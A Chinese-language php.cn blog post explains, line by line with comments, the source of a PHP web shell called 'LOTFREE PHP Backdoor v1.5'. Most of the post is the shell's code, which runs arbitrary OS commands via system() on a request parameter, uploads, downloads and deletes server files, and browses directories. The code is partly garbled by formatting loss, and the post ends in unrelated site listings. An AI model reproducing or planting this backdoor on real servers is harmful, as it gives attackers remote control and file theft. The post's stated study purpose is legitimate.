解释PHP后门文件

php中文网

发布时间：2016-07-25 09:13:33

2333人浏览过

来源于php中文网

原创

PHP Backdoor Version 1.5是由sirius_black / LOTFREE TEAM编写的一个php后门程序,这里对其进行一下简单解析,也当做自己学习php的笔记,该后门程序成执行的命令,取决于安装web服务器和php时用户的权限,如果是管理员的话,那就可以执行各种操作系统命令。

以下是一个后门程序的注释

function good_link($link)
{
$link=ereg_replace(“/+”,”/”,$link);
$link=ereg_replace(“/[^/(..)]+/\.\.”,”/”,$link);
$link=ereg_replace(“/+”,”/”,$link);
if(!strncmp($link,”./”,2) && strlen($link)>2)$link=substr($link,2);
if($link==”")$link=”.”;
return $link;
}
//$_REQUEST用来取得提交到本文件的数据
$dir=isset($_REQUEST['dir'])?$_REQUEST['dir']:”.”; //如果没有定义dir,dir取默认值”.”
$dir=good_link($dir);
$rep=opendir($dir); //打开dir指定的路径句柄
chdir($dir); //切换到dir指定的目录
if(isset($_REQUEST["down"]) &&$_REQUEST["down"]!=”") //如果定义了down
{
header(“Content-Type: application/octet-stream”);
header(“Content-Length: “.filesize($_REQUEST["down"]));
header(“Content-Disposition: attachment; filename=”.basename($_REQUEST["down"]));
readfile($_REQUEST["down"]); //将文件读取到缓冲区
exit();
}
?>
LOTFREE PHP Backdoor v1.5,易踪网yeetrack.com
echo “当前绝对路径为: ”.getcwd().”
\n”; //获取当前的绝对路径
echo “dir = ‘$dir’
\n”;
echo “当前目录,文件列表!

\n”;
//如果已经输入要执行的命令
if(isset($_REQUEST['cmd']) &&$_REQUEST['cmd']!=”")
{

echo “

\n”;<br></li><li>system($_REQUEST['cmd']); //在服务器上执行输入的命令,执行结果回显<br></li><li>echo “

\n”;

}
//如果已经上传了文件
if(isset($_FILES["fic"]["name"]) && isset($_POST["MAX_FILE_SIZE"])) //获取post上来的文件,保存到当前目录
{
if($_FILES["fic"]["size"]
{
if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link(“./”.$_FILES["fic"]["name"]))) //将临时文件保存到当前目录
{
echo “文件保存成功 “.good_link(“./”.$_FILES["fic"]["name"]).”!
\n”;
}
else echo “文件上传失败: “.$_FILES["fic"]["error"].”
\n”;
}
else echo “File too large(文件超出大小限制)!
\n”;
}
if(isset($_REQUEST['rm']) &&$_REQUEST['rm']!=”") //如果定义了rm,即删除指定的文件
{
if(unlink($_REQUEST['rm'])) //unlink是php的删除文件函数
echo “成功删除 “.$_REQUEST['rm'].”!
\n”;
else echo “删除文件失败
\n”;
}
?>

$t_dir=array();

$t_file=array();

$i_dir=0;

$i_file=0;

//循环输读取前的目录文件,放在t_dir和t_file中

while($x=readdir($rep))

{

if(is_dir($x)) //如果当前处理的是目录

$t_dir[$i_dir++]=$x;

else //如果当前处理的是文件

$t_file[$i_file++]=$x;

}

closedir($rep); //关闭由opendir打开的目录句柄

while(1) //循环输入当前路径的目录和文件

{

if(!$x && !$y)

break;

}

if($x=each($t_dir))

{

$name=$x["value"]; //获取t_dir数组里的目录名称

if($name==’.'){}

elseif($name==’..’) echo “ UP(父目录)

\n”; //展示一个UP链接,读取父目录的文件列表

else

echo “ ”.$name.”\n”;

}

//$_SERVER['PHP_SELF']取得当前php脚本文件名

if($y=each($t_file))

{

if($y["key"]%2==0) //如果当前处理的是key

echo ” bgcolor=’lightgreen’>\n”;

else //如果当前处理的是value,即文件。就将该文件展示出来,且提供下载链接。

echo “>\n”;

echo “ ”.$y["value"].”\n”;

}

else echo“>\n”;

if($y)

{

//如果是文件,就提供以下删除该文件的链接

if($y["key"]%2==0)echo ” bgcolor=’lightgreen’”;

echo “>Del”;

}

else echo “>\n”;

?dir=”>revenirau repertoire d’origine
”>
Execute commande(执行操作系统命令)
上传文件到服务器当前目录:
”>

复制代码

PHP框架能在鸿蒙系统跑吗_跨平台兼容性情况介绍【介绍】

如何通过 AJAX 向 PHP 批量上传多个 Base64 图片数据

PHP如何创建文件并加密_简单文件加密解密方法【详解】

PHP卸载后环境变量怎么清理_删除系统路径配置的步骤【教程】

PHP怎样判断文件inode信息_PHP获取inode法【属性】

PHP速学教程(入门到精通)

PHP怎么学习？PHP怎么入门？PHP在哪学？PHP怎么学才快？不用担心，这里为大家提供了PHP速学教程(入门到精通)，有需要的小伙伴保存下载就能学习啦！

下载

本站声明：本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

上一篇：为Ddiscuzx2.5帖子左侧栏加回加好友及打招呼功能下一篇：收藏大家好，请各位程序员朋友帮帮忙，为了网站的事很头痛。

热门AI工具

DeepSeek

幻方量化公司旗下的开源大模型平台

AI 编程开发 AI 聊天问答

豆包大模型

字节跳动自主研发的一系列大型语言模型

AI 编程开发 AI大模型

通义千问

阿里巴巴推出的全能AI助手

AI 编程开发 Agent智能体

腾讯元宝

腾讯混元平台推出的AI助手

文档处理 AI 聊天问答

文心一言

文心一言是百度开发的AI聊天机器人，通过对话可以生成各种形式的内容。

AI 编程开发 AI 文本写作

讯飞写作

基于讯飞星火大模型的AI写作工具，可以快速生成新闻稿件、品宣文案、工作总结、心得体会等各种文文稿

AI 文本写作中文写作

即梦AI

一站式AI创作平台，免费AI图片和视频生成。

AI 图片处理图片拼接

ChatGPT

最最强大的AI聊天机器人程序，ChatGPT不单是聊天机器人，还能进行撰写邮件、视频脚本、文案、翻译、代码等任务。

AI 编程开发 AI 文本写作

智谱清言 - 免费全能的AI助手

AI 编程开发 Agent智能体

相关专题

pixiv网页版官网登录与阅读指南_pixiv官网直达入口与在线访问方法

本专题系统整理pixiv网页版官网入口及登录访问方式，涵盖官网登录页面直达路径、在线阅读入口及快速进入方法说明，帮助用户高效找到pixiv官方网站，实现便捷、安全的网页端浏览与账号登录体验。

616

2026.02.13

微博网页版主页入口与登录指南_官方网页端快速访问方法

本专题系统整理微博网页版官方入口及网页端登录方式，涵盖首页直达地址、账号登录流程与常见访问问题说明，帮助用户快速找到微博官网主页，实现便捷、安全的网页端登录与内容浏览体验。

194

2026.02.13

Flutter跨平台开发与状态管理实战

本专题围绕Flutter框架展开，系统讲解跨平台UI构建原理与状态管理方案。内容涵盖Widget生命周期、路由管理、Provider与Bloc状态管理模式、网络请求封装及性能优化技巧。通过实战项目演示，帮助开发者构建流畅、可维护的跨平台移动应用。

2026.02.13

TypeScript工程化开发与Vite构建优化实践

本专题面向前端开发者，深入讲解 TypeScript 类型系统与大型项目结构设计方法，并结合 Vite 构建工具优化前端工程化流程。内容包括模块化设计、类型声明管理、代码分割、热更新原理以及构建性能调优。通过完整项目示例，帮助开发者提升代码可维护性与开发效率。

2026.02.13

Redis高可用架构与分布式缓存实战

本专题围绕 Redis 在高并发系统中的应用展开，系统讲解主从复制、哨兵机制、Cluster 集群模式及数据分片原理。内容涵盖缓存穿透与雪崩解决方案、分布式锁实现、热点数据优化及持久化策略。通过真实业务场景演示，帮助开发者构建高可用、可扩展的分布式缓存系统。

2026.02.13

c语言数据类型

本专题整合了c语言数据类型相关内容，阅读专题下面的文章了解更多详细内容。

2026.02.12

雨课堂网页版登录入口与使用指南_官方在线教学平台访问方法

本专题系统整理雨课堂网页版官方入口及在线登录方式，涵盖账号登录流程、官方直连入口及平台访问方法说明，帮助师生用户快速进入雨课堂在线教学平台，实现便捷、高效的课程学习与教学管理体验。

2026.02.12

豆包AI网页版入口与智能创作指南_官方在线写作与图片生成使用方法

本专题汇总豆包AI官方网页版入口及在线使用方式，涵盖智能写作工具、图片生成体验入口和官网登录方法，帮助用户快速直达豆包AI平台，高效完成文本创作与AI生图任务，实现便捷智能创作体验。

598

2026.02.12

PostgreSQL性能优化与索引调优实战

本专题面向后端开发与数据库工程师，深入讲解 PostgreSQL 查询优化原理与索引机制。内容包括执行计划分析、常见索引类型对比、慢查询优化策略、事务隔离级别以及高并发场景下的性能调优技巧。通过实战案例解析，帮助开发者提升数据库响应速度与系统稳定性。

2026.02.12

热门下载

网站特效

网站源码

网站素材

前端模板